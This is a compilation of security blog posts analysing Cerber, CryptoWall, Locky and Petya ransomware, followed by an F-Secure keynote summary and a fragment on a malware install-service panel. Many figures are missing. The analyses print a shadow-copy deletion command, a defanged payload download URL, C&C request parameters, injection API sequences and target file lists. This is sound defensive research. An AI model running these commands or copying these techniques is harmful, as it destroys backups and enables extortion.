Download the file, save it, then Run

Download the file, save it, then Run

Md5 Hash: ee0828a4e4c195d97313bfc7d4b531f1

The downloaded file is the cryptor part of the Cerber ransomware. This program is the one responsible for scanning and encrypting target files on a victim’s system. The full analysis of this component will be discussed on a separate blog. It is interesting to note that the downloaded cerber executable will encrypt your files even in the absence of internet connection. The code inside the EXE indicates that it does not connect to a remote server (unlike the ones before it e.g. crytowall, locky, Teslacrypt, etc.) to encrypt the victim’s files.

Once a system is successfully infected it will display the following in the desktop.

And spawn an instance of your browser containing the message:

And play a sound “your documents, photos, databases, and other important files have been encrypted” in a robot voice.

Infection Summary

Flow of the Cerber attack scenario

Flow of the Cerber attack scenario

  1. A spear-phishing email that contains a malicious Office attachment arrives.
  2. If the user opens the email, executed the attachment AND the macro setting for Office is set to enabled, the macro will execute spawning another VBS script.
  3. The script will contact a remote server, downloads and execute the cryptor part of the Cerber ransomware.
  4. Proceeds on scanning and encrypting the user’s files.
  5. Displays a notice that your system has been infected by Cerber ransomware.

The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

The Day the Earth Stood Still for CryptoWall

It’s been the norm in the cybersecurity industry to be intrigued and at the same time be infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It’s been slowly released in the wild since the early 2009, but CryptoWall redefined the meaning of ransomware and took it to the next level. Early ransomware used file sharing sites to upload infected files disguised as a normal file that could be downloaded by anyone. Once downloaded, it would run through the user’s machines and start encrypting the user’s data or locking their machines. So how did the CryptoWall evade our traditional defender – antivirus? We’ll break down just how CryptoWall did it:

ACT I: Setting the Stage

Communication is the most common tool in any business today. CryptoWall authors have been scraping the Internet for any published company email addresses (usually available via marketing sites) to use as the entry point of the attack. These sourced email addresses are then blasted with phishing emails. These phishing emails are crafted in a way that makes the receiver think it’s an important email and should be read and understood properly. They usually contain a link to a direct download or a file attachment of CryptoWall – unbeknownst to the user. The encryption starts when the user clicks.

Here is the sample of a ransomware-laced email disguised as a email: email example email example

ACT II: The Latest CryptoWall 4.0 Disassembled

CryptoWall  4.0

Md5: e73806e3f41f61e7c7a364625cd58f65

On the initial infection, the sample resolves the addresses of all the API functions that it needs to call later. This is done by means of a list of hashes, one for the name of every API call. This way the malware does not have to use an import table or store API names directly as strings.

Next, the malware gathers the following system information:

  • ComputerName
  • UserName
  • SystemDrive serial number
  • Number of CPUs (using PROCESSOR_Level)
  • Revision Number of CPU (using PROCESSOR_REVISION)
  • OS Major version
  • OS Minor version
  • IsWow64
  • Keyboard Layout

Among the loaded modules are DLLs related to Windows Crypto API (CRYPTSP), Windows 7 Enhanced Cryptographic Provider (RSAENH). This suggests that the malware is going to perform some cryptographic operations.

Figure 2


It will create the md5 hash of the victims PC using the above system information by using the following API sequence:

  • CryptAcquireContext
  • CryptCreateHash ; Algorithm ID = CALG_MD5 0x00008003, hash key: nonkeyed algorithm (0)
  • CryptHashData
  • CryptGetHashParam


Example 1

Example 2

Example 3

The malware will inject code in a newly spawned child process – Explorer.exe – using the following APIs:

  • ZwCreateSection
  • ZwMapViewOfSection
  • ZwAllocateVirtualMemory
  • ZwWriteVirtualMemory
  • ZwProtectVirtualMemory
  • ZwQueueApcThread
  • ZwResumeThread

It will create a copy of the original file in the %APPDATA% folder and create AutoStart Registry entry.

The injected code will be responsible for disabling system protection, as well as deleting all the system shadow copy and injecting code in a newly spawned process, svchost.exe.

Deleting shadow copies

Deleting shadow copies, allowing the malware to disable file recovery services.

 AV Limitations:

– Emulation TimeOut

Disable system restore

Disable system restore

Execution continues in the svchost.exe process.  This process formulates the commands needed to communicate with the C&C server. It will also gather the above system information and generate an md5 hash of the victims PC that will be used in communicating with the C&C server.

Some of the C&C servers:

C&C servers

C&C servers

The network communication is using HTTP, but with an encrypted payload. It will try to establish a connection in one of the following I2P proxy through I2P URLs. Once it succeeds, it will send a POST request with the encoded string request.

Figure 3

CryptoWall stores the following information inside a configuration file:

  • Received public key binary data
  • TXT
  • HTML
  • PNG

The last three files will be written in each folder of the victim’s system after the file-encryption process.

  • Normal file behavior
  • Payload after multiple layers of encryption

ACT III: “It’s like I left my keys inside my car”

If you’ve ever locked your keys inside your car, you know how irritating it feels. You know where they are, but you can’t do anything about it and you have to pay a locksmith to open it for you – or get real crafty with a wire coat hanger. Ransomware is a lot like that: Your most precious information and data has been held for ransom, and there is a chance that it could be released to the public – and you have no way to stop it.



Once CryptoWall has finished encrypting your files, it will launch the ransom notes that explain what happened and how to purchase the decrypter.

For an even deeper dive into CryptoWall, check out our analysis of CryptoWall 4 here.

ACT IV: Finding Solutions to Guard Against Ransomware

The bright spot in all this is that, if you can see the trend of the infection, there are lots of points where we can actually stop CryptoWall.

The first stop is via email. Advanced email defense solutions designed to catch malware that evades traditional defenses is a great tool to help stop attacks by detecting phishing links and exploits that deliver ransomware. That can stop CryptoWall from encrypting and taking the data from you.

The next defense is bolstering your network. Adding an advanced defense solution that identifies and correlates discovered threats with anomalous network activity is an invaluable tool to guard your data. ThreatTrack’s ThreatSecure Network, for instance, provides end-to-end network visibility and real-time detection to catch traffic hitting known malicious IPs associated with ransomware distribution and C&C.

The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

Understanding the Latest Version of Locky Ransomware

It is one of the most prevalent spam malware in the wild today: Locky ransomware. The Locky malware authors started their campaign last year but didn’t become very active until January 2016 – and they haven’t slowed down since.

Locky e-mails usually come in with an attached zip archive and once extracted may contain a document or JavaScript. The Locky ransomware we discovered included a JavaScript that will potentially download and run an executable. The executable is the focal point of this analysis and the latest version of the Locky ransomware.

Locky spam email

The spam email sent by the malware authors.

Basic Infection Flow and File Hashes:

  • 1582A0B6A04854C39F8392B061C52A7A – The .zip attachment
  • 59D2E5827F0EFFE7569B2DAE633AFD1F – The JavaScript extracted from the .zip
  • F79C950FA3EFC3BB29A4F15AE05448F2The Locky executable downloaded by the Javascript
Basic infection and file hashes

Basic infection and file hashes

Indications of Compromise:

It is fairly easy to find out if a machine is infected by Locky. The image below shows the desktop background of a compromised Windows XP machine.

Desktop of a Locky-infected computer

Desktop of a Locky-infected computer


The files that have been encrypted by the ransomware are named with the extension “.locky” and their names start with the personal ID for the infected user – in this case “8B74B4AA40D51F4A,” an MD5 hash. There is also a text file named “_HELP_instructions.txt” that contains the same message displayed in the desktop background.

Locky files

Locky files

Locky creates an encrypted user-specific registry key at HKCU\Software. The details about the registry values will be discussed later on in this post. The key created was “8W21gQe9WZ3tc.


Encrypted user-specific key

Encrypted user-specific key


Payment Instructions

The user is instructed to install TOR browser to access the payment webpage – shown below. The victim must have a bitcoin wallet to send 1.5 bitcoin to the specified bitcoin address.

Payment page for Locky ransomware

Payment page for Locky ransomware 

A Look at the JavaScript 59D2E5827F0EFFE7569B2DAE633AFD1F

The JavaScript is straightforward. The following lines are visible once opened in a text editor:

JavaScript 1

JavaScript 1

The Javascript downloads via GET command from http://goldish[dot]dk/o2pds and executes it in %Temp%. The executable will not run properly if not located in a %Temp% folder.

In-Depth Analysis of the Executable F79C950FA3EFC3BB29A4F15AE05448F2

Just like other malware families such as Upatre, Dridex and Crypto, the real Locky executable is wrapped by some encryption routines to avoid signature-based detections. The last step of the unwrapping process is to decompress the executable by using RTLDecompressBuffer API. We’ve seen this same method before from Upatre and Necurs rootkit downloaders.

RTLDecompressBuffer API

RTLDecompressBuffer API


The MD5 of the unwrapped Locky executable analyzed is F35D01F835FC637E0D9E66CD7E571C06.

The first step of the executable is to decrypt the following CnC Server IP addresses.

CnC Server IP addresses

CnC Server IP addresses


The executable retrieves the Windows directory by the API GetWindowsDirectoryA. Then it will be used as a parameter for the API GetVolumeNameForVolumeMountPointA. This Function retrieves the volume GUID path associated with the machine’s Windows folder.

Windows directory

Windows directory 

This GUID will serve as the initial basis of the Locky ransomware for the unique ID of the user.

First, GUID be used by the executable for the API CryptHashData.

API CryptHashData

API CryptHashData

For The executable to obtain the unique ID – “8B74B4AA40D51F4A” – for the machine, it will use the API CryptGetHashParam to get the unique ID associated with the GUID. It is visible at the first 8 Bytes at the hex dump.

API CryptGetHashParam

API CryptGetHashParam


This unique ID is correlated with the new registry key of this version of Locky. The ID will be converted by a checksum to string routine implemented by the executable to obtain a string that will be used as its registry key.

For this new version, these particular set of instructions explain why the new registry key is “8W21gQe9WZ3tc” instead of “Locky,” used before in the older versions.

New registry key

New registry key 

CnC Communication

The Locky executable sends a “POST” request to “http://<IP/Domain>/submit.php” by the following commands and parameters:

Commands Parameters (Remove the <>)
&act=getkey&affid= id=<>,&lang=<>,&corp=<>,&serv=<>,&os=<>,&sp=<>,&x64=<>
&act=gettext&lang= id=<>
&act=stats&path= id=<>,&encrypted=<>,&failed=<>,&length=<>

An example of parameters for Command &act=getkey&affid=: (Not Encrypted Form)


These commands will be sent to the CnC server in encrypted form via the API HttpSendRequestA. The executable also receives an encrypted reply via the API InternetReadFile.

CnC server commands

CnC server commands


After sending the getkey command to the CnC, the executable will decrypt the encrypted message and getkey command it received the public RSA key. The image below shows a part of the decryption routine. The public RSA key is at the ASCII dump.

Decryption routine

Decryption routine 

Saving The Public Key in the User’s Machine

The executable will encrypt the public RSA key and its checksum will be converted to a string equivalent – just like how the registry key was created. It will be stored as a binary value in its registry key at HKCU\Software. The value name is “270CwQa9XuPIc7.”

Encrypting public RSA key

Encrypting public RSA key

A Message to the User

Then it will send the CnC command “&act=gettext&lang=.” This will retrieve the Locky ransomware message equivalent to the desktop background image.

Locky ransomware message

Locky ransomware message


Once again, just like the public RSA key, this message will be encrypted, stored to a binary value in the HKCU\software registry key created by the executable. The message is equivalent to the registry value “7CaY397p5R.”

Gathering the Drives, Network Resources and Files to Encrypt

Network Shares and Resources:

The executable used a routine consisting of APIs WNetOpenEnumW, WNetEnumResourcesW, WNetAddConnection2 and WNetCloseEnum to parse through these three types of resources:


The usage of NetResource Parsing Routine for different types of resources:

NetResource Parsing Routine

NetResource Parsing Routine

Upon enabling a shared folder for the machine under analysis, the image shows that the executable will connect to the shared folder so it can encrypt the files in the shared folder later on.

Encrypting files in the shared folder

Encrypting files in the shared folder

The executable then uses the APIs GetLogicalDrives and GetDriveTypeW to gather the possible drives to encrypt. In this case, it obtained the “C:\” drive.

Encrypting the C:/ drive

Encrypting the C:/ drive 

The last step is to spawn the thread that will encrypt the files per folder in the drives and resources that were gathered.

Final step in the Locky ransomware process

Final step in the Locky ransomware process


Deleting the Shadow Copies to Prevent Data Restoration

The next step for the executable is to delete the shadow copies by running this command:

“vssadmin.exe Delete Shadows /All /Quiet”

Other Ransomwares, including Crypto, has used this same command.

The File Encryption Process – the Thread Spawned

The first step in this phase is to parse the directories and files of the machine. The executable allocates a memory space as a structured reference for the files to be encrypted.

White List Check

While parsing the directories of the machine, it will check the file name of each file against the following set of white list strings. File names that have one of the “ff.” strings will not be encrypted.

  • @_HELP_instructions.bmp, _HELP_instructions.txt, _Locky_recover_instructions.bmp, _Locky_recover_instructions.txt, tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, Windows

Black List Check

The Locky executable also checks the extension of the file to be encrypted. If the file has one of the “ff.” extensions, it will be encrypted.

  • .001, .002, .003, .004, .005, .006, .007, .008, .009, .010, .011, .123, .3dm, .3ds, .3g2, .3gp, .602, .7z, .ARC, .CSV, .DOC, .DOT, .MYD, .MYI, .NEF, .PAQ, .PPT, .RTF, .SQLITE3, .SQLITEDB, .XLS, .aes, .asc, .asf, .asm, .asp, .avi, .bak, .bat, .bmp, .brd, .cgm, .class, .cmd, .cpp, .crt, .cs, .csr, .db, .dbf, .dch, .dif, .dip, .djv, .djvu, .docb, .docm, .docx, .dotm, .dotx, .fla, .flv, .frm, .gif, .gpg, .gz, .hwp, .ibd, .jar, .java, .jpeg, .jpg, .js, .key, .lay, .lay6, .ldf, .m3u, .m4u, .max, .mdb, .mdf, .mid, .mkv, .mml, .mov, .mp3, .mp4, .mpeg, .mpg, .ms11, .ms11 (Security copy), .n64, .odb, .odg, .odp, .ods, .odt, .onetoc2, .otg, .otp, .ots, .ott, .p12, .pas, .pdf, .pem, .php, .pl, .png, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .pptm, .pptx, .psd, .pst, .qcow2, .rar, .raw, .rb, .sch, .sh, .sldm, .sldx, .slk, .sql, .stc, .std, .sti, .stw, .svg, .swf, .sxc, .sxd, .sxi, .sxm, .sxw, .tar, .tar.bz2, .tbk, .tgz, .tif, .tiff, .txt, .uop, .uot, .vb, .vbs, .vdi, .vmdk, .vmx, .vob, .wav, .wb2, .wk1, .wks, .wma, .wmv, .xlc, .xlm, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .zip, wallet.dat (filename specific)

API and Function-Level Overview of the File Encryption Process:

The Locky ransomware’s claim that it uses AES and RSA is basically true. It used Crypto APIs during the encryption process, including CryptGenRandom and CryptEncrypt. It also had two functions in this process that used the instructions “aesenc” and “aeskeygenassisst.

API overview

API overview

Dissecting the Last 0x344 Bytes of an Encrypted Locky File

In the image below, the last 0x344 bytes are being written at the end of file. The first four bytes are hard coded by the executable. We believe this is some sort of an identifier for the Locky ransomware authors for the version that encrypted the user’s files.

Hard-coded 0x8956FE93

Hard-coded 0x8956FE93


Writing to the file

Writing to the file 

The Next 0x10 bytes are obviously the unique ID of the user. The next 0x100 bytes are the output of the CryptEncrypt API. The last 0x230 bytes are from the AESENC function mentioned from the encryption flow before.

Finalizing the Infection

The executable will generate the “_HELP_instructions.txt” file for every folder path where it encrypted a file. It will also generate an equivalent Bitmap image for the instructions and store it so it becomes the user’s desktop background.

The executable will then send another actioncalled “stats” – to the CnC server:                  id=8B74B4AA40D51F4A&act=stats&path=c%3A&encrypted=1&failed=0&length=5912

Path = the infected Drive “C:\”

Encrypted = True

Failed = false

Length = number of files

The last step is to create the last encrypted registry value. It is equivalent to the previous version “Completed = Yes.” This completes the details about the three encrypted registry values.

Last step of the encryption process

Last step of the encryption process


The analyzed executable also had the domain generation algorithm, which has been known to exist for the Locky ransomware since its existence last year. It will be used by the executable if it cannot receive a response from the initially decrypted IP addresses.

How to Mitigate

Using ThreatSecure products, it is possible to block the ransomware executable from downloading. The image below shows ThreatSecure Network detecting the malicious download via the GET procedure.


ThreatSecure in action

ThreatSecure in action 

Prior to opening an e-mail attachment, the customer can use ThreatTrack’s dynamic malware analysis sandbox product – ThreatAnalyzer – to determine if the file is malicious. ThreatAnalyzer logs its output in a file named “analysis.xml.” By looking at this output, you can tell it has seen the executable’s ransomware behaviors (IoCs).

Stored and Encrypted Files to .locky:

The sandbox detects that the files were encrypted, and the “Help Instructions” text file was also generated.

Help instructions text file

Help instructions text file 

Network capture of Communication to CnC via post command to the CnC Server IP:

An outgoing connection is being initiated by Locky.

Network capture of communication to CnC

Network capture of communication to CnC


Process capture of Vssadmin.exe execution, deleting all backups:

Process capture of Vssadmin.exe execution

Process capture of Vssadmin.exe execution

Setting an encrypted registry value “4Y0743Ngl” at HKCU\software:

Prior to file encryption, Locky enumerates the network resources of the machine, which can also be encrypted. ThreatAnalyzer was also able to see this behavior:

Locky enumerating network resources

Locky enumerating network resources


As shown here, advanced threat defense products like those used here help avoid ransomware infection. The advanced solutions catch the emerging threat before it can do any damage.

What’s more, the sandbox capabilities of ThreatAnalyzer also showed that it can log indications of compromise and potential malicious activities once a user accidentally opens the attachment – one more way users are guarded against increasingly popular ransomware attacks.

The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

A Glimpse at Petya Ransomware

Ransomware has become an increasingly serious threat. Cryptowall, TeslasCrypt and Locky are just some of the ransomware variants that infected large numbers of victims. Petya is the newest strain and the most devious among them.

Petya will not only encrypt files but it will make the system completely useless, leaving the victim no choice but to pay for the ransom, and it will encrypt filesystem’s Master File Table, which leaves the operating system unable to load. MFT is an essential file in NTFS file system. It contains every file record and directory on NTFS logical volume. Each record contains all the particulars that the operating system need to boot properly.

Like any other malware, Petya is widely distributed via a job application spear-phishing email that comes with a Dropbox link luring the victim by claiming the link contains self-extracting CV; in fact, it contains self-extracting executable that would later unleash its malicious behavior.

Petya dropper

Petya’s dropper

Petya's infection behavior

Petya’s infection behavior

 Petya ransomware has two infection stages. The first stage is MBR infection and encryption key generation, including the decryption code used in ransom messages. The second stage is MFT encryption.

First Stage of Encryption

First infection stage behavior

First infection stage behavior

An MBR infection is made through straightforward \\.\PhysicalDrive0 manipulation with the help of DeviceIOControl API. It first retrieves the physical location of the root drive \\.\c by sending IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS control code to the device driver.  Then it sends the extended disk partition info of \\.\PhysicalDrive0 through IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS control code.


The dropper will encrypt the original MBR using XOR opcode and 0x37 and save it for later use. It will also create 34 disk sectors containing 0x37. Right after the 34 sectors are Petya’s MFT infecting code. Located on Sector 56 is the original encrypted MBR.

Infected disk view

Infected disk view

Infected disk view

Infected disk view

Original Encrypted MBR

Original Encrypted MBR

After the MBR infection, it will intentionally crash the system by triggering NTRaiseHardError. This will trigger BSOD and the system will start, which will cause the machine to load using the infected MBR.

Code snippet triggering BSOD

Code snippet in triggering BSOD



Once we inspected the dumped image of the disk, we discovered it was showing a fake CHKDSK screen. We will also see the ransom message and ASCII skull art.

Dumped disk image

Dumped disk image

Second Infection Stage

The stage 2 infection code is written in 16-bit architecture, which uses BIOS interrupt calls.

Upon system boot up, it will load into memory Petya’s malicious code, which is located at sector 34. It will first determine if the system is already infected by checking the first byte at sector is 0x0. If not infected, it will display fake CHKDSK.



When someone sees the Figure 8, it means that the MFT table is already encrypted using salsa20 algorithm.

Figure 8

The victim will see this screen upon boot.

The victim will see this screen upon boot.

Ransom message and instructions

Ransom message and instructions

Petya Ransomware Page

The webpage for the victim to access their personal decryption key is protected against bots and contains information about when the Petya ransomware project was launched, warnings on what not to do when recovering files and an FAQ page. The page is surprisingly very user friendly and shows the days left before the ransom price will be doubled.

Ransom page captcha

Ransom page captcha

 Petya’s homepage

Petya’s homepage

It also contains news feeds, including different blogs and news from AV companies warning about Petya.

News 1 Figure 13

News 2

They also provide a step-by-step process on how to pay the ransom, including instructions on how to purchase bitcoin. Support via web is included too in case the victim encounters problems in the transaction they’ve made. Petya’s ransom is a lot cheaper compared to other ransomware, too.

Petya web page 1

Petya web page 2

Petya web page 3

Petya web page 4

On Step 4 of the payment procedure, the “next” button is disabled until they’ve confirmed that they already received the payment.

Petya support page

Petya’s support page

Below is a shot of ThreatTrack’s ThreatSecure Network dashboard catching Petya. Tools like ThreatSecure can detect and disrupt attacks in real time.

ThreatSecure Network catching Petya ransomware

ThreatSecure Network catching Petya ransomware


The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

5 things you need to know about securing our future

“Securing the future” is a huge topic, but our Chief Research Officer Mikko Hypponen narrowed it down to the two most important issues is his recent keynote address at the CeBIT conference. Watch the whole thing for a Matrix-like immersion into the two greatest needs for a brighter future — security and privacy.

To get started here are some quick takeaways from Mikko’s insights into data privacy and data security in a threat landscape where everyone is being watched, everything is getting connected and anything that can make criminals money will be attacked.

1. Criminals are using the affiliate model.
About a month ago, one of the guys running CTB Locker — ransomware that infects your PC to hold your files until you pay to release them in bitcoin — did a reddit AMA to explain how he makes around $300,000 with the scam. After a bit of questioning, the poster revealed that he isn’t CTB’s author but an affiliate who simply pays for access to a trojan and an exploit-kid created by a Russian gang.

“Why are they operating with an affiliate model?” Mikko asked.

Because now the authors are most likely not breaking the law. In the over 250,000 samples F-Secure Labs processes a day, our analysts have seen similar Affiliate models used with the largest banking trojans and GameOver ZeuS, which he notes are also coming from Russia.

No wonder online crime is the most profitable IT business.

2. “Smart” means exploitable.
When you think of the word “smart” — as in smart tv, smartphone, smart watch, smart car — Mikko suggests you think of the word exploitable, as it is a target for online criminals.

Why would emerging Internet of Things (IoT) be a target? Think of the motives, he says. Money, of course. You don’t need to worry about your smart refrigerator being hacked until there’s a way to make money off it.

How might the IoT become a profit center? Imagine, he suggests, if a criminal hacked your car and wouldn’t let you start it until you pay a ransom. We haven’t seen this yet — but if it can be done, it will.

3. Criminals want your computer power.
Even if criminals can’t get you to pay a ransom, they may still want into your PC, watch, fridge or watch for the computing power. The denial of service attack against Xbox Live and Playstation Netwokr last Christmas, for instance likely employed a botnet that included mobile devices.

IoT devices have already been hijacked to mine for cypto-currencies that could be converted to Bitcoin then dollars or “even more stupidly into Rubbles.”

4. If we want to solve the problems of security, we have to build security into devices.
Knowing that almost everything will be able to connect to the internet requires better collaboration between security vendors and manufacturers. Mikko worries that companies that have never had to worry about security — like a toaster manufacturer, for instance — are now getting into IoT game. And given that the cheapest devices will sell the best, they won’t invest in proper design.

5. Governments are a threat to our privacy.
The success of the internet has let to governments increasingly using it as a tool of surveillance. What concerns Mikko most is the idea of “collecting it all.” As Glenn Glenwald and Edward Snowden pointed out at CeBIT the day before Mikko, governments seem to be collecting everything — communication, location data — on everyone, even if you are not a person of interest, just in case.

Who knows how that information may be used in a decade from now given that we all have something to hide?




Install service for Malware affiliates and individuals

This install service was running since a long time but the server recently died.
People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.


Statistics by days:
(Date, Unique visits, General visits)

Statistics by countries:
(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)

(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)

(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:
(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
 (Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)

There is some interesting people in this listing:
Severa (Know for FakeAV, Spam)
Malwox Affiliate (Mayachok.1)
Feodal cash Affiliate (Bitcoin malware)

And if you want to know about the EXE files loaded... all are malwares (Zeus,SpyEye, Russian lockers, Spam bots, Mayachok... etc..)
The x64 Zbot covered by Kaspersky also come from here.
The executables was rotating and was refreshed constantly, from this system, around 400 samples can be pulled per day.

Download statistics for client 191 ( Malwox TEST ):
(Date,  Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)

Edit user:

Add user:

Schedule for user:

Menu: users list, add, FTP, Stats.

For the FTP list, most of accounts were with shell on them.


From the source:
$useZorkaJob = 0; //схч чрїюфр
$useSputnikJob = 0;
$useRekloJob = 0;
$useSpoiskJob = 0;
$useBegunCheatJob = 0;
Begun is one of the biggest ads services in Russia.